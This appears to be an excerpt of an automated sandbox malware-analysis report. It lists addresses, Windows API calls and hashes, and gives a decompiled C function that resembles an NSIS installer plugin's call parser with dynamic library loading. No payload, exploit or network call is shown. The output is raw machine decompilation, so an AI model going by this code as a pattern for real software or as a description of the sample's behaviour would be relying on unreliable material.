                                                                                    0x00404d1e
                                                                                    0x00404d1f
                                                                                    0x00404d22
                                                                                    0x00404d25
                                                                                    0x00000000
                                                                                    0x00404d25
                                                                                    0x00404c9c
                                                                                    0x00404c9e
                                                                                    0x00404ca2
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404ca4
                                                                                    0x00404ca4
                                                                                    0x00404cb1
                                                                                    0x00404cb6
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404cba
                                                                                    0x00404cbc
                                                                                    0x00404cbc
                                                                                    0x00404cc5
                                                                                    0x00404cc7
                                                                                    0x00404ccc
                                                                                    0x00404ccf
                                                                                    0x00404cd4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404cd4
                                                                                    0x00404d31
                                                                                    0x00404d3b
                                                                                    0x00404d3e
                                                                                    0x00404d41
                                                                                    0x00404d48
                                                                                    0x00404d48
                                                                                    0x00404d4a
                                                                                    0x00404d4a
                                                                                    0x00404d4f
                                                                                    0x00404d51
                                                                                    0x00404d59
                                                                                    0x00404d60
                                                                                    0x00404d62
                                                                                    0x00404d6d
                                                                                    0x00404d6d
                                                                                    0x00404d62
                                                                                    0x00404d7d
                                                                                    0x00404d87
                                                                                    0x00404d8f
                                                                                    0x00404daa
                                                                                    0x00404d91
                                                                                    0x00404d9a
                                                                                    0x00404d9a
                                                                                    0x00404d8f
                                                                                    0x00404daf
                                                                                    0x00404db4
                                                                                    0x00404db9
                                                                                    0x00404dc2
                                                                                    0x00404dc2
                                                                                    0x00404dcb
                                                                                    0x00404dcd
                                                                                    0x00404dcd
                                                                                    0x00404dd9
                                                                                    0x00404de1
                                                                                    0x00404deb
                                                                                    0x00404deb
                                                                                    0x00404df0
                                                                                    0x00000000
                                                                                    0x00404df0
                                                                                    0x00404c9a
                                                                                    0x00404c51
                                                                                    0x00404c58
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404c58
                                                                                    0x00404b77
                                                                                    0x00404b80
                                                                                    0x00404b9a
                                                                                    0x00404b9f
                                                                                    0x00404ba9
                                                                                    0x00404bb0
                                                                                    0x00404bbc
                                                                                    0x00404bbf
                                                                                    0x00404bc2
                                                                                    0x00404bc9
                                                                                    0x00404bd1
                                                                                    0x00404bd4
                                                                                    0x00404bd8
                                                                                    0x00404bdf
                                                                                    0x00404be7
                                                                                    0x00404c41
                                                                                    0x00404be9
                                                                                    0x00404bea
                                                                                    0x00404bf1
                                                                                    0x00404bfb
                                                                                    0x00404c03
                                                                                    0x00404c10
                                                                                    0x00404c24
                                                                                    0x00404c28
                                                                                    0x00404c28
                                                                                    0x00404c24
                                                                                    0x00404c2d
                                                                                    0x00404c3a
                                                                                    0x00404c3a
                                                                                    0x00404be7
                                                                                    0x00000000
                                                                                    0x00404b9f
                                                                                    0x00404b8d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404b93
                                                                                    0x00000000
                                                                                    0x00404afe
                                                                                    0x00404b0b
                                                                                    0x00404b14
                                                                                    0x00404b21
                                                                                    0x00404b21
                                                                                    0x00404b28
                                                                                    0x00404b2e
                                                                                    0x00404b37
                                                                                    0x00404b3a
                                                                                    0x00404b3d
                                                                                    0x00404b45
                                                                                    0x00404b48
                                                                                    0x00404b4b
                                                                                    0x00404b51
                                                                                    0x00404b58
                                                                                    0x00404b5f
                                                                                    0x00404df6
                                                                                    0x00404e08
                                                                                    0x00404b65
                                                                                    0x00404b68
                                                                                    0x00000000
                                                                                    0x00404b68
                                                                                    0x00404b5f

                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404B04
                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                                                                                    • lstrcmpiW.KERNEL32(Call,00423748,00000000,?,?), ref: 00404C1C
                                                                                    • lstrcatW.KERNEL32(?,Call), ref: 00404C28
                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404C3A
                                                                                      • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,75213420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                                                      • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,75213420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                                                      • Part of subcall function 004068EF: CharPrevW.USER32(?,?,75213420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                                                    • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                                                                                      • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                                                      • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                                                                                      • Part of subcall function 00404E71: SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.14981204986.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.14981181274.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981262134.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981287805.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981426539.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981453122.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.14981491518.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: A$C:\Users\user\AppData\Local\Temp$Call$H7B
                                                                                    • API String ID: 2624150263-3840399979
                                                                                    • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                    • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                                                                                    • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                                                                                    • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 70E21BFF Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMONCrypto
                                                                                    Download Yara Rule
                                                                                    C-Code - Quality: 95%
                                                                                    			E70E21BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E70E212BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E70E212BB();
				_t321 = E70E212E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t332 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E70E213B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E70E2162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x70e223e8) & 0x000000ff) * 4 +  &M70E2235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E70E212CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
										case 2:
											_v8 = _v8 | 0xffffffff;
											goto L57;
										case 3:
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v16 = _v16 + 1;
											goto L85;
										case 4:
											__eflags = _v20;
											if(_v20 != 0) {
												goto L57;
											}
											_v12 = _v12 - 2;
											__ebx = E70E212BB();
											 &_v12 = E70E21B86( &_v12);
											__eax = E70E21510(__edx, __eax, __edx, __ebx);
											goto L97;
										case 5:
											L105:
											_v20 = _v20 + 1;
											goto L57;
										case 6:
											_push(7);
											goto L123;
										case 7:
											_push(0x19);
											goto L143;
										case 8:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L107;
										case 9:
											_push(0x15);
											goto L143;
										case 0xa:
											_push(0x16);
											goto L143;
										case 0xb:
											_push(0x18);
											goto L143;
										case 0xc:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L118;
										case 0xd:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L109;
										case 0xe:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L111;
										case 0xf:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L122;
										case 0x10:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L113;
										case 0x11:
											_push(3);
											goto L123;
										case 0x12:
											_push(0x17);
											L143:
											_pop(__ebx);
											goto L98;
										case 0x13:
											__eax =  &_v12;
											__eax = E70E21B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											__eflags = __ebx - 0xb;
											if(__ebx < 0xb) {
												__ebx = __ebx + 0xa;
											}
											goto L97;
										case 0x14:
											__ebx = 0xffffffff;
											goto L98;
										case 0x15:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L116;
										case 0x16:
											__ecx = 0;
											__eflags = 0;
											goto L91;
										case 0x17:
											__eax = 0;
											__eax = 1;
											__eflags = 1;
											goto L120;
										case 0x18:
											_t271 =  *(_t332 + 0x1014);
											__eflags = _t271 - _v16;
											if(_t271 > _v16) {
												_v16 = _t271;
											}
											_v8 = _v8 & 0x00000000;
											_v20 = _v20 & 0x00000000;
											_v36 - 3 = _t271 - (_v36 == 3);
											if(_t271 != _v36 == 3) {
												L85:
												_v40 = 1;
											}
											goto L57;
										case 0x19:
											L107:
											__ecx = 0;
											_v8 = 2;
											__ecx = 1;
											goto L91;
										case 0x1a:
											L118:
											_push(5);
											goto L123;
										case 0x1b:
											L109:
											__ecx = 0;
											_v8 = 3;
											__ecx = 1;
											goto L91;
										case 0x1c:
											L111:
											__ecx = 0;
											__ecx = 1;
											goto L91;
										case 0x1d:
											L122:
											_push(6);
											goto L123;
										case 0x1e:
											L113:
											_push(2);
											goto L123;
										case 0x1f:
											__eax =  &_v12;
											__eax = E70E21B86( &_v12);
											__ebx = __eax;
											__ebx = __eax + 1;
											goto L97;
										case 0x20:
											L116:
											_v52 = _v52 + 1;
											_push(4);
											_pop(__ecx);
											goto L91;
										case 0x21:
											L120:
											_push(4);
											L123:
											_pop(__ecx);
											L91:
											__edi = _v16;
											__edx =  *(0x70e2405c + __ecx * 4);
											__eax =  ~__eax;
											asm("sbb eax, eax");
											_v40 = 1;
											__edi = _v16 << 5;
											__eax = __eax & 0x00008000;
											__edi = (_v16 << 5) + __esi;
											__eax = __eax | __ecx;
											__eflags = _v8;
											 *(__edi + 0x1018) = __eax;
											if(_v8 < 0) {
												L93:
												__edx = 0;
												__edx = 1;
												__eflags = 1;
												L94:
												__eflags = _v8 - 1;
												 *(__edi + 0x1028) = __edx;
												if(_v8 == 1) {
													__eax =  &_v12;
													__eax = E70E21B86( &_v12);
													__eax = __eax + 1;
													__eflags = __eax;
													_v8 = __eax;
												}
												__eax = _v8;
												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
												_t136 = _v16 + 0x81; // 0x81
												_t136 = _t136 << 5;
												__eax = 0;
												__eflags = 0;
												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
												 *((intOrPtr*)(__edi + 0x1030)) = 0;
												 *((intOrPtr*)(__edi + 0x102c)) = 0;
												L97:
												__eflags = __ebx;
												if(__ebx == 0) {
													goto L57;
												}
												L98:
												__eflags = _v20;
												_v40 = 1;
												if(_v20 != 0) {
													L103:
													__eflags = _v20 - 1;
													if(_v20 == 1) {
														__eax = _v16;
														__eax = _v16 << 5;
														__eflags = __eax;
														 *(__eax + __esi + 0x102c) = __ebx;
													}
													goto L105;
												}
												_v16 = _v16 << 5;
												_t144 = __esi + 0x1030; // 0x1030
												__edi = (_v16 << 5) + _t144;
												__eax =  *__edi;
												__eflags = __eax - 0xffffffff;
												if(__eax <= 0xffffffff) {
													L101:
													__eax = GlobalFree(__eax);
													L102:
													 *__edi = __ebx;
													goto L103;
												}
												__eflags = __eax - 0x19;
												if(__eax <= 0x19) {
													goto L102;
												}
												goto L101;
											}
											__eflags = __edx;
											if(__edx > 0) {
												goto L94;
											}
											goto L93;
										case 0x22:
											goto L57;
									}
								}
								_t272 = _t269 - 1;
								__eflags = _t272;
								if(_t272 == 0) {
									_v16 = _t283;
									goto L80;
								}
								__eflags = _t272 != 1;
								if(_t272 != 1) {
									goto L162;
								}
								__eflags = _t286 - 0x6e;
								if(__eflags > 0) {
									_t309 = _t286 - 0x72;
									__eflags = _t309;
									if(_t309 == 0) {
										_push(4);
										L74:
										_pop(_t274);
										L75:
										__eflags = _v8 - 1;
										if(_v8 != 1) {
											_t96 = _t332 + 0x1010;
											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
											__eflags =  *_t96;
										} else {
											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
										}
										_v8 = 1;
										goto L57;
									}
									_t312 = _t309 - 1;
									__eflags = _t312;
									if(_t312 == 0) {
										_push(0x10);
										goto L74;
									}
									__eflags = _t312 != 0;
									if(_t312 != 0) {
										goto L57;
									}
									_push(0x40);
									goto L74;
								}
								if(__eflags == 0) {
									_push(8);
									goto L74;
								}
								_t315 = _t286 - 0x21;
								__eflags = _t315;
								if(_t315 == 0) {
									_v8 =  ~_v8;
									goto L57;
								}
								_t316 = _t315 - 0x11;
								__eflags = _t316;
								if(_t316 == 0) {
									_t274 = 0x100;
									goto L75;
								}
								_t317 = _t316 - 0x31;
								__eflags = _t317;
								if(_t317 == 0) {
									_t274 = 1;
									goto L75;
								}
								__eflags = _t317 != 0;
								if(_t317 != 0) {
									goto L57;
								}
								_push(0x20);
								goto L74;
							} else {
								_v32 = _t283;
								_v36 = _t283;
								goto L20;
							}
						}
						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
						if( *((short*)(_t321 - 2)) != 0x3a) {
							goto L17;
						}
						__eflags = _v32 - _t283;
						if(_v32 == _t283) {
							goto L43;
						}
						goto L17;
					}
					_t277 = _t258 - 5;
					if(_t277 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							__eflags = _v36 - 3;
							_v32 = 1;
							_v8 = _t283;
							_v20 = _t283;
							_v16 = (0 | _v36 == 0x00000003) + 1;
							_v40 = _t283;
							goto L20;
						}
					}
					_t281 = _t277 - 1;
					if(_t281 == 0) {
						__eflags = _v44 - _t283;
						if(_v44 != _t283) {
							goto L43;
						} else {
							_v32 = 2;
							_v8 = _t283;
							_v20 = _t283;
							goto L20;
						}
					}
					if(_t281 != 0x16) {
						goto L43;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L20;
					}
				}
				GlobalFree(_v56);
				GlobalFree(_v24);
				GlobalFree(_v48);
				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
					L182:
					return _t332;
				} else {
					_t225 =  *_t332 - 1;
					if(_t225 == 0) {
						_t187 = _t332 + 8; // 0x8
						_t324 = _t187;
						__eflags =  *_t324 - _t283;
						if( *_t324 != _t283) {
							_t226 = GetModuleHandleW(_t324);
							__eflags = _t226 - _t283;
							 *(_t332 + 0x1008) = _t226;
							if(_t226 != _t283) {
								L171:
								_t192 = _t332 + 0x808; // 0x808
								_t325 = _t192;
								_t227 = E70E216BD( *(_t332 + 0x1008), _t325);
								__eflags = _t227 - _t283;
								 *(_t332 + 0x100c) = _t227;
								if(_t227 == _t283) {
									__eflags =  *_t325 - 0x23;
									if( *_t325 == 0x23) {
										_t195 = _t332 + 0x80a; // 0x80a
										_t231 = E70E213B1(_t195);
										__eflags = _t231 - _t283;
										if(_t231 != _t283) {
											__eflags = _t231 & 0xffff0000;
											if((_t231 & 0xffff0000) == 0) {
												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v52 - _t283;
								if(_v52 != _t283) {
									L178:
									_t325[lstrlenW(_t325)] = 0x57;
									_t229 = E70E216BD( *(_t332 + 0x1008), _t325);
									__eflags = _t229 - _t283;
									if(_t229 != _t283) {
										L166:
										 *(_t332 + 0x100c) = _t229;
										goto L182;
									}
									__eflags =  *(_t332 + 0x100c) - _t283;
									L180:
									if(__eflags != 0) {
										goto L182;
									}
									L181:
									_t206 = _t332 + 4;
									 *_t206 =  *(_t332 + 4) | 0xffffffff;
									__eflags =  *_t206;
									goto L182;
								} else {
									__eflags =  *(_t332 + 0x100c) - _t283;
									if( *(_t332 + 0x100c) != _t283) {
										goto L182;
									}
									goto L178;
								}
							}
							_t234 = LoadLibraryW(_t324);
							__eflags = _t234 - _t283;
							 *(_t332 + 0x1008) = _t234;
							if(_t234 == _t283) {
								goto L181;
							}
							goto L171;
						}
						_t188 = _t332 + 0x808; // 0x808
						_t236 = E70E213B1(_t188);
						 *(_t332 + 0x100c) = _t236;
						__eflags = _t236 - _t283;
						goto L180;
					}
					_t237 = _t225 - 1;
					if(_t237 == 0) {
						_t185 = _t332 + 0x808; // 0x808
						_t238 = _t185;
						__eflags =  *_t238 - _t283;
						if( *_t238 == _t283) {
							goto L182;
						}
						_t229 = E70E213B1(_t238);
						L165:
						goto L166;
					}
					if(_t237 != 1) {
						goto L182;
					}
					_t81 = _t332 + 8; // 0x8
					_t284 = _t81;
					_t326 = E70E213B1(_t81);
					 *(_t332 + 0x1008) = _t326;
					if(_t326 == 0) {
						goto L181;
					}
					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1050)) = E70E212CC(_t284);
					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
					_t90 = _t332 + 0x808; // 0x808
					_t229 =  *(_t326->i + E70E213B1(_t90) * 4);
					goto L165;
				}
			}

































































                                                                                    0x70e21c07
                                                                                    0x70e21c0a
                                                                                    0x70e21c0d
                                                                                    0x70e21c10
                                                                                    0x70e21c13
                                                                                    0x70e21c16
                                                                                    0x70e21c19
                                                                                    0x70e21c1b
                                                                                    0x70e21c1e
                                                                                    0x70e21c21
                                                                                    0x70e21c26
                                                                                    0x70e21c29
                                                                                    0x70e21c31
                                                                                    0x70e21c39
                                                                                    0x70e21c3b
                                                                                    0x70e21c3e
                                                                                    0x70e21c46
                                                                                    0x70e21c46
                                                                                    0x70e21c4b
                                                                                    0x70e21c4e
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21c5b
                                                                                    0x70e21c60
                                                                                    0x70e21c62
                                                                                    0x70e21cf4
                                                                                    0x70e21cf4
                                                                                    0x70e21cf4
                                                                                    0x70e21cf8
                                                                                    0x70e21cfb
                                                                                    0x70e21cfd
                                                                                    0x70e21d1f
                                                                                    0x70e21d21
                                                                                    0x70e21d24
                                                                                    0x70e21d33
                                                                                    0x70e21d35
                                                                                    0x70e21d3b
                                                                                    0x70e21d3b
                                                                                    0x70e21d41
                                                                                    0x70e21d44
                                                                                    0x70e21d44
                                                                                    0x70e21d47
                                                                                    0x70e21d47
                                                                                    0x70e21d4d
                                                                                    0x70e21d4f
                                                                                    0x70e21d4f
                                                                                    0x70e21d51
                                                                                    0x70e21d54
                                                                                    0x70e21d57
                                                                                    0x70e21d5d
                                                                                    0x70e21d63
                                                                                    0x70e21d66
                                                                                    0x70e21d8a
                                                                                    0x70e21d8d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21d90
                                                                                    0x70e21d92
                                                                                    0x70e21da0
                                                                                    0x70e21da3
                                                                                    0x70e21da5
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21da7
                                                                                    0x70e21da7
                                                                                    0x70e21da7
                                                                                    0x70e21dad
                                                                                    0x70e21daf
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21db1
                                                                                    0x70e21db3
                                                                                    0x70e21db5
                                                                                    0x70e21db7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21db7
                                                                                    0x70e21db9
                                                                                    0x70e21dbb
                                                                                    0x70e21dbd
                                                                                    0x70e21dbd
                                                                                    0x70e21dc3
                                                                                    0x70e21dc9
                                                                                    0x70e21dcb
                                                                                    0x70e21ddf
                                                                                    0x70e21ddf
                                                                                    0x70e21de1
                                                                                    0x70e21dcd
                                                                                    0x70e21dd3
                                                                                    0x70e21dd6
                                                                                    0x70e21dd6
                                                                                    0x00000000
                                                                                    0x70e21d68
                                                                                    0x70e21d68
                                                                                    0x70e21d68
                                                                                    0x70e21d69
                                                                                    0x70e21d71
                                                                                    0x70e21d75
                                                                                    0x70e21d7b
                                                                                    0x70e21d7f
                                                                                    0x00000000
                                                                                    0x70e21d7f
                                                                                    0x70e21d6b
                                                                                    0x70e21d6b
                                                                                    0x70e21d6c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21d6e
                                                                                    0x70e21d6f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x70e21d6f
                                                                                    0x70e21cff
                                                                                    0x70e21d00
                                                                                    0x70e21d09
                                                                                    0x70e21d0c
                                                                                    0x70e21d19
                                                                                    0x70e21d19
                                                                                    0x70e21d0e
                                                                                    0x70e21d0e
                                                                                    0x70e21de7
